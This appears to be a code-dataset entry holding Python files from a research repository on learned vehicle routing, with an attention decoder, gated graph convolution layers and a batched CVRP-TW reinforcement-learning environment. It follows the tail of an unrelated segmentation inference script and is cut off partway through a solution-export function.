stride_w = int(np.ceil(self.crop_w*stride_rate))
grid_h = int(np.ceil(float(new_h-self.crop_h)/stride_h) + 1)
grid_w = int(np.ceil(float(new_w-self.crop_w)/stride_w) + 1)
prediction_crop = torch.zeros((self.pred_dim, new_h, new_w)).cuda()
count_crop = torch.zeros((new_h, new_w)).cuda()
start = time.time()
for index_h in range(0, grid_h):
for index_w in range(0, grid_w):
s_h = index_h * stride_h
e_h = min(s_h + self.crop_h, new_h)
s_h = e_h - self.crop_h
s_w = index_w * stride_w
e_w = min(s_w + self.crop_w, new_w)
s_w = e_w - self.crop_w
image_crop = image[s_h:e_h, s_w:e_w].copy()
count_crop[s_h:e_h, s_w:e_w] += 1
prediction_crop[:, s_h:e_h, s_w:e_w] += self.net_process(image_crop, flip=False)
start = time.time()
prediction_crop /= count_crop.unsqueeze(0)
# disregard predictions from padded portion of image
prediction_crop = prediction_crop[:, pad_h_half:pad_h_half+ori_h, pad_w_half:pad_w_half+ori_w]
# CHW -> HWC
prediction_crop = prediction_crop.permute(1,2,0)
prediction_crop = prediction_crop.data.cpu().numpy()
prediction = prediction_crop
# upsample or shrink predictions back down to scale=1.0
#prediction = cv2.resize(prediction_crop, (w, h), interpolation=cv2.INTER_LINEAR)
return prediction
def net_process(self, image: np.ndarray, flip: bool = True):
""" Feed input through the network.
In addition to running a crop through the network, we can flip
the crop horizontally, run both crops through the network, and then
average them appropriately.
Args:
- model:
- image:
- flip: boolean, whether to average with flipped patch output
Returns:
- output:
"""
input = torch.from_numpy(image.transpose((2, 0, 1))).float()
normalize_img(input, self.mean, self.std)
input = input.unsqueeze(0)
if self.use_gpu:
input = input.cuda()
if flip:
# add another example to batch dimension, that is the flipped crop
input = torch.cat([input, input.flip(3)], 0)
with torch.no_grad():
output = self.model(input)
_, _, h_i, w_i = input.shape
_, _, h_o, w_o = output.shape
if (h_o != h_i) or (w_o != w_i):
output = F.interpolate(output, (h_i, w_i), mode='bilinear', align_corners=True)
if self.output_taxonomy == 'universal':
output = self.softmax(output)
elif self.output_taxonomy == 'test_dataset':
output = self.convert_pred_to_label_tax_and_softmax(output)
else:
print('Unrecognized output taxonomy. Quitting....')
quit()
# print(time.time() - start1, image_scale.shape, h, w)
if flip:
# take back out the flipped crop, correct its orientation, and average result
output = (output[0] + output[1].flip(2)) / 2
else:
output = output[0]
# output = output.data.cpu().numpy()
# convert CHW to HWC order
# output = output.transpose(1, 2, 0)
# output = output.permute(1,2,0)
return output
def convert_pred_to_label_tax_and_softmax(self, output):
"""
"""
if not self.args.universal:
output = self.tc.transform_predictions_test(output, self.args.dataset)
else:
output = self.tc.transform_predictions_universal(output, self.args.dataset)
return output
# def convert_label_to_pred_taxonomy(self, target):
# """
# """
# if self.args.universal:
# _, target = ToFlatLabel(self.tc, self.args.dataset)(target, target)
# return target.type(torch.uint8).numpy()
# else:
# return target
if __name__ == '__main__':
pass
``` |
{
"source": "jokofa/JAMPR_plus",
"score": 2
} |
#### File: model/decoders/attn_decoder.py
```python
from typing import Union
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor, BoolTensor
from lib.model.decoders.base_decoder import BaseDecoder
class AttnDecoder(BaseDecoder):
"""
Attention decoder model.
adapted from:
<NAME>., <NAME>., & <NAME>. (2018).
Attention, learn to solve routing problems!.
arXiv preprint arXiv:1803.08475.
"""
def __init__(self,
query_emb_dim: int,
action_emb_dim: int,
hidden_dim: int = 128,
num_heads: int = 4,
clip_tanh: Union[int, float] = 10.,
bias: bool = False,
**kwargs):
super(AttnDecoder, self).__init__(
query_emb_dim,
action_emb_dim,
hidden_dim
)
self.num_heads = num_heads
self.clip_tanh = clip_tanh
self.bias = bias
head_dim = hidden_dim // num_heads
assert head_dim * num_heads == hidden_dim, "<hidden_dim> must be divisible by <num_heads>!"
self.head_dim = head_dim
# scaling factors for scaled product attention
self.u_norm = (float(head_dim) ** -0.5)
self.nc_norm = (float(hidden_dim) ** -0.5)
self.ctxt_proj, self.set_proj, self.out_proj = None, None, None
self.create_layers(**kwargs)
def create_layers(self, **kwargs):
"""Create the specified model layers."""
self.ctxt_proj = nn.Linear(self.query_emb_dim, self.hidden_dim, bias=self.bias)
# set_proj -> glimpse_key, glimpse_val, logit_key
self.set_proj = nn.Linear(self.action_emb_dim, 3 * self.hidden_dim, bias=self.bias)
self.out_proj = nn.Linear(self.hidden_dim, self.hidden_dim, bias=self.bias)
def reset_parameters(self):
self.ctxt_proj.reset_parameters()
self.set_proj.reset_parameters()
self.out_proj.reset_parameters()
def forward(self,
query_emb: Tensor,
action_emb: Tensor,
mask: BoolTensor,
**kwargs):
# calculate projections and create heads
ctxt = self._make_heads(self.ctxt_proj(query_emb[:, None, :]))
# split projection of size 3x hidden_dim: glimpses -> (n_heads, BS*M, hdim)
glimpse_key, glimpse_val, logit_key = self._split_set(self.set_proj(action_emb))
# compatibility (scoring) --> (n_heads, BS, 1, K)
x = torch.matmul(ctxt, glimpse_key.transpose(-2, -1)) * self.u_norm
# mask compatibility
if mask is not None:
x[mask[None, :, None, :].expand_as(x)] = float('-inf')
# compute attention heads --> (n_heads, BS, K, 1, head_dim)
x = torch.matmul(F.softmax(x, dim=-1), glimpse_val)
# calculate projection for updated context embedding (BS, 1, hdim)
x = self.out_proj(
x.permute(1, 2, 0, 3).contiguous().view(-1, 1, self.hidden_dim)
)
# compute logits --> (BS, K)
x = torch.matmul(x, logit_key.transpose(-2, -1)).squeeze(-2) * self.nc_norm
# tanh clipping/saturation
if self.clip_tanh:
x = torch.tanh(x) * self.clip_tanh
# apply mask
if mask is not None:
x[mask] = float('-inf')
return F.log_softmax(x, dim=-1) # logits
def _make_heads(self, x: Tensor):
"""Makes attention heads for the provided glimpses (BS, N, emb_dim)"""
return (
x.contiguous()
.view(x.size(0), x.size(1), self.num_heads, -1) # emb_dim --> head_dim * n_heads
.permute(2, 0, 1, 3) # (n_heads, BS, N, head_dim)
)
def _split_set(self, x):
"""Split projected tensor into required components."""
glimpse_key, glimpse_val, logit_key = x.chunk(3, dim=-1)
return self._make_heads(glimpse_key), self._make_heads(glimpse_val), logit_key.contiguous()
# ============= #
# ### TEST #### #
# ============= #
def _test(
bs: int = 5,
n: int = 10,
k: int = 3,
cuda=False,
seed=1
):
device = torch.device("cuda" if cuda and torch.cuda.is_available() else "cpu")
torch.manual_seed(seed)
QDIM = 64
ADIM = 32
num_a = (n//2)*k
q_emb = torch.randn(bs, QDIM).to(device)
a_emb = torch.randn(bs, num_a, ADIM).to(device)
mask = torch.randint(0, 2, (bs, num_a)).to(dtype=torch.bool, device=device)
dec = AttnDecoder(QDIM, ADIM).to(device)
logits = dec(q_emb, a_emb, mask)
assert logits.size() == torch.empty((bs, num_a)).size()
return True
```
#### File: model/encoders/eg_graph_conv.py
```python
from typing import Tuple
from torch_geometric.typing import Adj
import torch
import torch.nn as nn
from torch import Tensor
from torch_scatter import scatter_sum
from torch_geometric.nn.conv import MessagePassing
from lib.utils import get_activation_fn, get_norm
#
class EGGConv(MessagePassing):
"""Gated graph convolution using node and edge information
('edge gated graph convolution' - EGGC).
torch geometric implementation based on original formulation in
- Bresson and Laurent 2018, Residual Gated Graph ConvNets
- Joshi et al. 2019, An Efficient Graph Convolutional Network Technique for the Travelling Salesman Problem
"""
def __init__(self,
in_channels: int,
out_channels: int,
activation: str = "relu",
norm_type: str = "bn",
bias: bool = False,
aggr: str = "mean",
**kwargs):
super(EGGConv, self).__init__(aggr=aggr, **kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.activation = activation
self.norm_type = norm_type
self.act = get_activation_fn(activation, module=True, inplace=False)
assert in_channels == out_channels, f"currently only works for 'in_channels' == 'out_channels'"
self.w1 = nn.Linear(in_channels, out_channels, bias=bias)
self.w2 = nn.Linear(in_channels, out_channels, bias=bias)
self.w3 = nn.Linear(in_channels, out_channels, bias=bias)
self.w4 = nn.Linear(in_channels, out_channels, bias=bias)
self.w5 = nn.Linear(in_channels, out_channels, bias=bias)
self.edge_norm = get_norm(norm_type, hdim=out_channels)
self.node_norm = get_norm(norm_type, hdim=out_channels)
def reset_parameters(self):
self.w1.reset_parameters()
self.w2.reset_parameters()
self.w3.reset_parameters()
self.w4.reset_parameters()
self.w5.reset_parameters()
def forward(self,
x: Tensor,
edge_index: Adj,
e: Tensor,
) -> Tuple[Tensor, Tensor]:
# message passing
new_x, new_e = self.propagate(edge_index, x=x, e_ij=e)
# apply BN and activation
x = x + self.act(self.node_norm(self.w1(x) + new_x))
e = e + self.act(self.edge_norm(new_e))
return x, e
def message(self,
x_i: Tensor,
x_j: Tensor,
e_ij: Tensor,
index: Tensor
) -> Tuple[Tensor, Tensor]:
# calculate node proj
w2x_j = self.w2(x_j)
# calculate gates
eta_ij = torch.sigmoid(e_ij)
gated_x_j = eta_ij * w2x_j
# aggregate
if self.aggr == 'mean':
# rather than a mean this is normalizing the gates!
aggr_x = scatter_sum(gated_x_j, index=index, dim=0) / (1e-20 + scatter_sum(eta_ij, index=index, dim=0))
elif self.aggr == 'sum':
aggr_x = scatter_sum(gated_x_j, index=index, dim=0)
else:
raise RuntimeError(f"aggregation {self.aggr} not supported.")
# calculate edge proj
w3e_ij = self.w3(e_ij)
w4x_i = self.w4(x_i)
w5x_j = self.w5(x_j)
# new edge emb
e_ij = w3e_ij + w4x_i + w5x_j
return aggr_x, e_ij
def aggregate(self, inputs: Tuple[Tensor, Tensor]) -> Tuple[Tensor, Tensor]:
# overwrite with pass through identity,
# since aggregation is already done in message()
return inputs
def __repr__(self):
return '{}(in: {}, out: {}, act_fn: {}, norm: {})'.format(
self.__class__.__name__,
self.in_channels,
self.out_channels,
self.activation,
self.norm_type,
)
#
# ============= #
# ### TEST #### #
# ============= #
def _test(
cuda=False,
seed=1,
):
import sys
device = torch.device("cuda" if cuda and torch.cuda.is_available() else "cpu")
torch.manual_seed(seed)
N = 4
D = 16
x = torch.randn(N, D).to(device)
edge_index = torch.tensor([[0, 1, 2, 2, 3, 3], [0, 0, 1, 1, 3, 2]]).to(device)
edge_weight = torch.randn(edge_index.size(-1), D).to(device)
conv = EGGConv(D, D)
try:
x, e = conv(x, edge_index, edge_weight)
assert x.size() == (N, D)
assert e.size() == (edge_index.size(-1), D)
except Exception as e:
raise type(e)(str(e)).with_traceback(sys.exc_info()[2])
```
#### File: model/encoders/graph_conv.py
```python
from typing import Optional, Tuple
from torch_geometric.typing import Adj
import torch
import torch.nn as nn
from torch import Tensor
from torch_geometric.nn.conv import MessagePassing
from lib.utils import get_activation_fn, get_norm
EDGECONVS = [
# edge_weight:
"GCNConv", "GCN2Conv", "GraphConv", "GatedGraphConv",
"TAGConv", "SGConv", "FAConv", "APPNP", "ARMAConv",
# edge_attr:
"TransformerConv", "GINEConv", "GMMConv", "GENConv", "GATv2Conv",
]
#
# NOTE: just for the record - we use the following ordering on layers: (Conv/Lin -> Act -> Norm)
#
class GraphConvBlock(nn.Module):
"""
Full graph convolutional block including
convolution and activation as well as optional
norm, skip connection and added linear layer.
"""
def __init__(self,
conv: MessagePassing,
in_channels: int,
out_channels: int,
activation: str = "gelu",
skip: bool = True,
norm_type: Optional[str] = "ln",
add_linear: bool = False,
aggr: str = "max",
**kwargs
):
super(GraphConvBlock, self).__init__()
self.conv = conv(
in_channels=in_channels,
out_channels=out_channels,
aggr=aggr,
**kwargs
)
self.activation = activation
self.act = get_activation_fn(activation, module=True, **kwargs)
self.norm_type = norm_type
self.norm = get_norm(norm_type, hdim=out_channels, **kwargs)
self.skip = skip
if self.skip and in_channels != out_channels:
raise RuntimeError(f"To apply skip connection, in_channels and out_channels must be the same!")
self.add_linear = add_linear
self.lin = nn.Linear(out_channels, out_channels) if add_linear else None
self.lin_norm = get_norm(norm_type, hdim=out_channels, **kwargs) if add_linear else None
self.reset_parameters()
def reset_parameters(self):
self.conv.reset_parameters()
if self.add_linear:
self.lin.reset_parameters()
def forward(self,
x: Tensor,
edge_index: Adj,
edge_weight: Optional[Tensor] = None,
**kwargs) -> Tuple[Tensor, Tensor]:
if self.skip:
x_ = x
if self.conv.__class__.__name__ in EDGECONVS:
# provide additional edge weights / attributes
x = self.act(self.conv(x, edge_index, edge_weight, **kwargs))
else:
x = self.act(self.conv(x, edge_index, **kwargs))
if self.skip:
x += x_
if self.norm is not None:
x = self.norm(x)
if self.add_linear:
if self.skip:
x_ = x
x = self.act(self.lin(x))
if self.skip:
x += x_
if self.lin_norm is not None:
x = self.norm(x)
return x, edge_weight
def __repr__(self):
return '{}(conv={}, in={}, out={}, act_fn={}, norm={}, skip={}, add_linear={})'.format(
self.__class__.__name__,
self.conv.__class__.__name__,
self.conv.in_channels,
self.conv.out_channels,
self.act.__class__.__name__,
self.norm_type,
self.skip,
self.add_linear,
)
#
# ============= #
# ### TEST #### #
# ============= #
def _test(
cuda=False,
seed=1,
**kwargs
):
import sys
import torch_geometric.nn as gnn
device = torch.device("cuda" if cuda and torch.cuda.is_available() else "cpu")
torch.manual_seed(seed)
conv_types_with_ew = ["GCNConv", "GraphConv"]
conv_types_without_ew = ["ResGatedGraphConv", "GATConv", "GATv2Conv", "ClusterGCNConv"]
conv_types = conv_types_with_ew + conv_types_without_ew
norm_types = [None, "ln", "bn"]
D = 16
x = torch.randn(4, D).to(device)
edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]]).to(device)
edge_weight = torch.randn(edge_index.size(-1)).to(device)
for c_type in conv_types:
for norm in norm_types:
try:
c_ = getattr(gnn, c_type)
conv = GraphConvBlock(c_, D, D, norm_type=norm).to(device)
if c_type in conv_types_with_ew:
out, _ = conv(x, edge_index, edge_weight)
else:
out, _ = conv(x, edge_index)
assert out.size() == (4, D)
except Exception as e:
raise type(e)(str(e)+f" - (conv: {c_type}, norm: {norm})\n").with_traceback(sys.exc_info()[2])
```
#### File: lib/routing/env.py
```python
import math
from typing import List, Tuple, Union, Optional
import time
import warnings
import logging
import numpy as np
import torch
from lib.routing.formats import RPInstance, RPObs
from lib.routing.visualization import Viewer
from lib.utils.graph_utils import GraphNeighborhoodSampler
from lib.utils.challenge_utils import dimacs_challenge_dist_fn
from lib.utils.seq_match import plan_to_string_seq, get_similarity_scores
logger = logging.getLogger("ENV")
class RPEnv:
"""
RL simulation environment to solve CVRP-TW.
Provides similar functionality to an OpenAI Gym environment,
but is natively batched and can be run completely on GPU.
"""
OBSERVATION_SPACE = {
"node_features": 7,
"tour_features": 5,
}
def __init__(self,
check_feasibility: bool = False,
max_concurrent_vehicles: int = 3,
k_nbh_frac: float = 0.25,
pomo: bool = False,
pomo_nbh_frac: float = 0.25,
pomo_single_start_node: bool = False,
num_samples: int = 1,
enable_render: bool = False,
plot_save_dir: Optional[str] = None,
device: Union[torch.device, str] = 'cpu',
fp_precision: torch.dtype = torch.float,
inference: bool = False,
tour_graph_update_step: int = 1,
debug: Union[bool, int] = False,
):
"""
Args:
check_feasibility: flag to check feasibility of updates
max_concurrent_vehicles: max number of concurrently planned vehicles
k_nbh_frac: fraction of graph_size defining size of node neighborhood
pomo: flag to use POMO sampling
pomo_nbh_frac: fraction of early TW to use as possible sampling candidates
pomo_single_start_node: flag to fix only one single node per POMO rollout,
independent of max_concurrent_vehicles
num_samples: number of samples per instance
enable_render: flag to enable rendering of environment
plot_save_dir: directory to save rendered GIF files
device: torch device to run env on
fp_precision: floating point precision for float valued tensors
tour_graph_update_step: number of steps when to update the tour edge graph
inference: flag to put env in inference mode
debug: flag to do additional checks and print additional debug information
"""
self.check_feasibility = check_feasibility # check feasibility of updates
self.max_concurrent_vehicles = max_concurrent_vehicles
self.k_nbh_frac = k_nbh_frac
self.pomo = pomo
if self.pomo:
if num_samples <= 1:
warnings.warn(f"POMO should use num_samples > 1")
self._num_samples = num_samples
elif inference:
self._num_samples = num_samples
else:
self._num_samples = 1
self.pomo_nbh_frac = pomo_nbh_frac
self.pomo_single_start_node = pomo_single_start_node
self.enable_render = enable_render
self.plot_save_dir = plot_save_dir
self.device = torch.device(device)
self.fp_precision = fp_precision
assert tour_graph_update_step != 0
self.tour_graph_update_step = tour_graph_update_step
self.inference = inference
self.debug_lvl = 2 if isinstance(debug, bool) and debug else int(debug)
if self.debug_lvl > 0:
self.check_feasibility = True
if self.debug_lvl > 2:
warnings.simplefilter('always', RuntimeWarning)
self.nbh_sampler = None
self.bs = None
self._bidx = None
self._total = None
self.coords = None
self.demands = None
self.tw = None
self.service_time = None
self.graph_size = None
self.org_service_horizon = None
self.max_vehicle_number = None
self.vehicle_capacity = None
self.service_horizon = None
self.time_to_depot = None
self._dist_mat = None
self._visited = None # nodes that have been visited (served)
self._finished = None # vehicles which have started a tour and returned to the depot
self.tour_plan = None
self.active_vehicles = None # which vehicles are currently active
self.active_to_plan_idx = None # map absolut vehicle idx to idx in vehicle buffer
self.next_index_in_tour = None # index at which to add next node to plan for each active vehicle
# dynamic vehicle features
self.cur_node = None
self.cur_cap = None
self.cur_time = None
self.cur_time_to_depot = None
# graph buffers
self.k_nbh_size = None
self.depot_idx = None
self._tour_batch_idx = None
self.nbh_edges, self.nbh_weights = None, None
self.tour_edges, self.tour_weights = None, None
self.ordered_idx = None
self.viewer = None
self.render_buffer = None
self._zero = torch.zeros(1, dtype=torch.long, device=self.device)
self._one = torch.ones(1, dtype=self.fp_precision, device=self.device)
self._has_instance = False
self._is_reset = False
self._step = None
self._render_cnt = 0
def seed(self, seed: int) -> List[int]:
torch.manual_seed(seed)
return [seed]
def reset(self) -> RPObs:
"""Reset the simulator and return the initial state."""
assert self._has_instance, f"need to load instance first."
self._step = 0
# reset graph buffers
self.depot_idx = None
self.ordered_idx = None
self.nbh_edges, self.nbh_weights = None, None
self.tour_edges, self.tour_weights = None, None
self._tour_batch_idx = None
# create graph attributes
self.to_graph()
# reset other buffers
self._visited = torch.zeros(self.bs, self.graph_size,
dtype=torch.bool, device=self.device)
self._finished = torch.zeros(self.bs, self.max_vehicle_number,
dtype=torch.bool, device=self.device)
seq_buffer_len = min(64, self.graph_size)
self.tour_plan = torch.zeros(self.bs, self.max_vehicle_number, seq_buffer_len,
dtype=torch.int16, device=self.device)
self.active_vehicles = torch.zeros(self.bs, self.max_vehicle_number,
dtype=torch.bool, device=self.device)
# set first max_concurrent vehicles as active
self.active_vehicles[:, :self.max_concurrent_vehicles] = 1
self.active_to_plan_idx = self.active_vehicles.nonzero(as_tuple=True)[1].view(self.bs, -1)
self.next_index_in_tour = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=torch.long, device=self.device)
self.cur_node = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=torch.long, device=self.device)
self.cur_cap = torch.full((self.bs, self.max_concurrent_vehicles), self.vehicle_capacity,
dtype=self.fp_precision, device=self.device)
self.cur_time = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=self.fp_precision, device=self.device)
self.cur_time_to_depot = torch.zeros(self.bs, self.max_concurrent_vehicles,
dtype=self.fp_precision, device=self.device)
if self.enable_render:
if self.viewer is not None:
self.viewer.save()
self.viewer.close()
self.viewer = None
self.render_buffer = {}
self._render_cnt += 1
self._total = torch.zeros(self.bs, dtype=self.fp_precision, device=self.device)
# POMO start node sampling
if self.pomo:
self._reset_pomo()
self._is_reset = True
return self._get_observation()
def step(self, action: torch.Tensor):
"""Take an action and do one step in the environment.
Args:
action: (BS, 2) - selected tour idx, selected node idx
Returns:
- observations,
- reward (cost),
- done,
- info dict
"""
assert self._is_reset
assert action.size(0) == self.bs and action.size(1) == 2
# action is selected tour and next node for that tour
tour_select = action[:, 0]
next_node = action[:, 1]
ret_mask = (next_node == self.depot_node)
cost = self._update(tour_select, next_node, ~ret_mask)
# convert selection idx to internal tour plan idx over max vehicles
tour_plan_select = self.active_to_plan_idx[self._bidx, tour_select]
# add next node in tour
nxt = self.next_index_in_tour[self._bidx, tour_select]
try:
self.tour_plan[self._bidx, tour_plan_select, nxt] = next_node.to(torch.int16)
except IndexError:
# this can also happen when the depot is not properly masked during inference
inf_msk = (nxt >= 64)
n_inf = inf_msk.sum()
inf_tours = self.tour_plan[inf_msk][self.active_vehicles[inf_msk]]
raise RuntimeError(f"Current rollout could not solve at least {n_inf} instances."
f"\nmax_len tours: {inf_tours}")
# increase idx of next position in tour
# (mask if selects depot, otherwise might exceed max seq len!)
not_ret = ~ret_mask
self.next_index_in_tour[self._bidx[not_ret], tour_select[not_ret]] = nxt[not_ret] + 1
all_visited = self.visited.all(-1)
self._visited[self._bidx, next_node] = 1
# depot node is never marked as visited!
self._visited[:, 0] = 0
# manage returning tours (and init new tour on return)
ret_mask = ret_mask & ~all_visited
if ret_mask.any():
nxt_active = self._get_next_active_vehicle()[ret_mask]
all_started = (nxt_active == 0)
ret_idx = ret_mask.nonzero(as_tuple=True)[0]
if all_started.any():
warnings.warn("used all available vehicles!", RuntimeWarning)
# remove idx of instance without further vehicles from indices to reset
ret_idx = ret_idx[~all_started]
nxt_active = nxt_active[~all_started]
ret_tour_idx = tour_select[ret_idx]
# reset buffers
self.cur_node[ret_idx, ret_tour_idx] = self.depot_node[ret_idx]
self.cur_cap[ret_idx, ret_tour_idx] = self.vehicle_capacity
if self.check_feasibility:
assert (self.cur_time[ret_idx, ret_tour_idx] <= 1.0).all()
self.cur_time[ret_idx, ret_tour_idx] = 0
assert (self.cur_time_to_depot[ret_idx, ret_tour_idx] == 0).all()
# update active and returned vehicles
cur_active = self.active_to_plan_idx[ret_idx, ret_tour_idx]
self._finished[ret_idx, cur_active] = 1
self.active_vehicles[ret_idx, cur_active] = 0
self.active_vehicles[ret_idx, nxt_active] = 1
self.next_index_in_tour[ret_idx, ret_tour_idx] = 0
# set active-plan idx map of currently returning vehicle to
# the plan idx of the next vehicle
self.active_to_plan_idx[ret_idx, ret_tour_idx] = nxt_active
# stop if
# 1) all nodes were visited or
# 2) all vehicles were used, in which case there might still be unvisited nodes!
done = self.visited.all() or self._step >= self.graph_size + self.max_vehicle_number + 1
if done:
# make sure all vehicles return to depot
added_cost = self._return_all()
cost += added_cost
# add cost for singleton tours to remaining unvisited nodes
if not self.visited.all():
s_bs_idx, s_nd_idx = (~self.visited).nonzero(as_tuple=True)
singleton_cost = self.time_to_depot[:, 1:][s_bs_idx, s_nd_idx] * 2
bs_idx, cnt_per_idx = s_bs_idx.unique(return_counts=True)
n_unq = len(bs_idx)
cst = torch.empty((n_unq, ), device=self.device, dtype=singleton_cost.dtype)
for i, (s, e) in enumerate(zip(self._cumsum0(cnt_per_idx), cnt_per_idx.cumsum(dim=-1))):
cst[i] = singleton_cost[s:e].sum()
cost[bs_idx] = cost[bs_idx] + cst
self._has_instance = False
self._is_reset = False
# update graph data
self.to_graph()
self._total += cost
info = {
'current_total_cost': self._total.cpu().numpy(),
'k_used': self.k_used.cpu().numpy() if done and len(self.k_used) > 0 else [-1],
'max_tour_len': self.tour_plan.argmin(dim=-1).max().item(),
}
self._step += 1
return self._get_observation() if not done else None, cost, done, info
def render(self, as_gif: bool = True, **kwargs):
assert self.enable_render, f"Need to specify <enable_render=True> on init."
if as_gif:
assert self.plot_save_dir is not None, f"need to specify directory to save gifs."
if self._step >= 155:
return # can only render max ~155 steps as GIF
b_idx = 0
if self.viewer is None:
if self.bs != 1 and self.debug_lvl > 1:
warnings.warn(f"batch_size > 1. Will only render batch instance with idx={b_idx}.")
# create new viewer object
self.viewer = Viewer(
locs=self.coords[b_idx].cpu().numpy(),
save_dir=self.plot_save_dir,
gif_naming=f"render_ep{self._render_cnt}",
as_gif=as_gif,
add_idx=False,
**kwargs
)
# update buffer and render new tour
self.render_buffer['edges'] = self._get_edges_to_render(b_idx)
self.viewer.update(
buffer=self.render_buffer,
cost=self._total[b_idx].cpu().item(),
n_iters=self._step,
**kwargs
)
return self.viewer.render_rgb()
def load_data(self, batch: List[RPInstance]) -> None:
"""Load a list of RPInstances into the environment."""
self.bs = len(batch)
self._bidx = torch.arange(self.bs, device=self.device)
self.coords = self._stack_to_tensor(batch, 'coords')
self.demands = self._stack_to_tensor(batch, 'demands')
self.tw = self._stack_to_tensor(batch, 'tw')
self.service_time = self._stack_to_tensor(batch, 'service_time')
gs = batch[0].graph_size
assert np.all(np.array([x.graph_size for x in batch]) == gs)
self.graph_size = gs
self.org_service_horizon = self._stack_to_tensor(batch, 'org_service_horizon')
k = batch[0].max_vehicle_number
assert np.all(np.array([x.max_vehicle_number for x in batch]) == k)
# provide slightly more vehicles to make sure we always get a solution for all nodes
self.max_vehicle_number = int(k + np.floor(np.log(k))) #int(k + np.floor(np.sqrt(gs)))
assert np.all(np.array([x.vehicle_capacity for x in batch]) == 1)
self.vehicle_capacity = batch[0].vehicle_capacity # normed to 1.0
assert np.all(np.array([x.service_horizon for x in batch]) == 1)
self.service_horizon = batch[0].service_horizon # normed to 1.0
assert np.all(np.array([x.depot_idx[0] for x in batch]) == 0)
if self.inference:
# compute and keep full distance matrix in memory
self._dist_mat = self.compute_distance_matrix(self.coords)
t_delta = self._dist_mat[:, :, 0]
else:
idx_pair = torch.stack((
torch.arange(0, self.graph_size, device=self.device)[None, :].expand(self.bs, self.graph_size),
self.depot_node[:, None].expand(self.bs, self.graph_size)
), dim=-1).view(self.bs, -1)
idx_coords = self.coords.gather(
dim=1, index=idx_pair[:, :, None].expand(self.bs, -1, 2)
).view(self.bs, -1, 2, 2)
t_delta = (
dimacs_challenge_dist_fn(idx_coords[:, :, 0, :], idx_coords[:, :, 1, :]) /
self.org_service_horizon[self._bidx][:, None]
)
self.time_to_depot = t_delta
if self.debug_lvl > 0:
assert (t_delta >= 0).all()
if ((self.tw[:, :, 1] + self.time_to_depot + self.service_time[:, None])[:, 1:] > 1.0).any():
msg = f"cannot return to the depot when arriving within TW of some customers."
if self.inference:
warnings.warn(msg + f" Applying fix during inference...")
else:
raise RuntimeError(msg)
if self.inference:
# quick and dirty fix for instances where it is not guaranteed that
# one can return to the depot when arriving within any TW of a customer
return_time = (self.tw[:, :, 1] + self.time_to_depot + self.service_time[:, None])
no_return_mask = (return_time > 1.0)
no_return_mask[:, 0] = False # always false für depot
if (no_return_mask.sum(-1) > self.graph_size * 0.05).any():
warnings.warn(f"Need to fix many TW for return to depot. Consider checking instance.")
delta = return_time[no_return_mask] - 1.0
new_tw = torch.stack((
self.tw[no_return_mask][:, 0],
self.tw[no_return_mask][:, 1]-delta
), axis=-1)
assert (new_tw[:, 1] - new_tw[:, 0] > 0.005).all()
self.tw[no_return_mask] = new_tw
if self.num_samples > 1 or self.pomo:
self._init_sampling()
# init nbh graph sampler if not existing yet (assumes all instances have same graph_size)
if self.nbh_sampler is None:
self.nbh_sampler = GraphNeighborhoodSampler(self.graph_size, k_frac=self.k_nbh_frac)
self._has_instance = True
def clear_cache(self):
"""Clear all object references to tensors."""
self.bs = None
self._bidx = None
self._total = None
self.coords = None
self.demands = None
self.tw = None
self.service_time = None
self.graph_size = None
self.org_service_horizon = None
self.max_vehicle_number = None
self.vehicle_capacity = None
self.service_horizon = None
self.time_to_depot = None
self._visited = None
self._finished = None
self.tour_plan = None
self.active_vehicles = None
self.active_to_plan_idx = None
self.next_index_in_tour = None
self.cur_node = None
self.cur_cap = None
self.cur_time = None
self.cur_time_to_depot = None
self.k_nbh_size = None
self.depot_idx = None
self._tour_batch_idx = None
self.nbh_edges, self.nbh_weights = None, None
self.tour_edges, self.tour_weights = None, None
self.ordered_idx = None
if self.viewer is not None:
self.viewer.close()
self.viewer = None
self.render_buffer = None
self._has_instance = False
self._is_reset = False
self._step = None
def export_sol(self, num_best: int = 3, num_other: int = 3, mode: str = "random") -> Tuple[List[List], List]:
"""
Export the current tour-plans as list (of lists of lists).
-> (original BS, num_best + num_other, max_num_vehicles, max_seq_len)
"""
if self._num_samples > 1:
# select "promising" tours
# first select num_best best solutions
n_smp = num_best + num_other
assert self._num_samples > n_smp, \
f"specified selection of total of {n_smp} samples but env was configured " \
f"with num_samples = {self._num_samples} < {n_smp}!"
cost_idx = self.total_cost.view(-1, self._num_samples).sort(dim=-1).indices
_bs = cost_idx.size(0)
idx = cost_idx[:, :num_best]
t_start = time.time()
if mode == "random":
logger.info(f"export with random sampling...")
# num_other random solutions
if num_other > 0:
rnd_idx = self._randint(bs=_bs, n=num_other, high=self._num_samples-num_best)
rnd_idx = cost_idx[:, num_best:].gather(dim=-1, index=rnd_idx)
idx = torch.cat((idx, rnd_idx), dim=-1)
# reshape over sample dimension and select samples at index
# from (org BS * n_samples, max_num_vehicles, max_seq_len) ->
tp = self.tour_plan.view(-1, self._num_samples, self.max_vehicle_number, self.tour_plan.size(-1)).gather(
dim=1, index=idx[:, :, None, None].expand(_bs, n_smp, self.max_vehicle_number, self.tour_plan.size(-1))
)
tours = self._sol_to_list(tp)
costs = self.total_cost.view(-1, self._num_samples).gather(dim=-1, index=idx).cpu().tolist()
elif mode == "similarity":
logger.info(f"export with similarity sampling...")
# num_other solutions which are most dissimilar to the best solutions selected
all_tours = self._sol_to_list(
self.tour_plan.view(-1, self._num_samples, self.max_vehicle_number, self.tour_plan.size(-1))
)
tours = []
costs = []
for bst, smps, cst in zip(
idx,
all_tours,
self.total_cost.view(-1, self._num_samples).cpu().tolist()
):
# select best
best_smps = [smps[i] for i in bst]
best_costs = [cst[i] for i in bst]
# select others
other_smps = [smps[i] for i in range(len(smps)) if i not in bst]
other_costs = [cst[i] for i in range(len(smps)) if i not in bst]
# calculate similarity scores of plans
# via (sub-)sequence matching
b = [plan_to_string_seq(p) for p in other_smps]
div_smp_idx = []
for smp in best_smps:
scores = get_similarity_scores(
anchor=plan_to_string_seq(smp),
candidates=b,
)
div_smp_idx.append(np.argsort(scores)) # get indices of lowest scores
# cyclic selection of most diverse other sample for each of the best samples
idx = []
i = 0
j = [0]*num_best
while len(idx) < num_other:
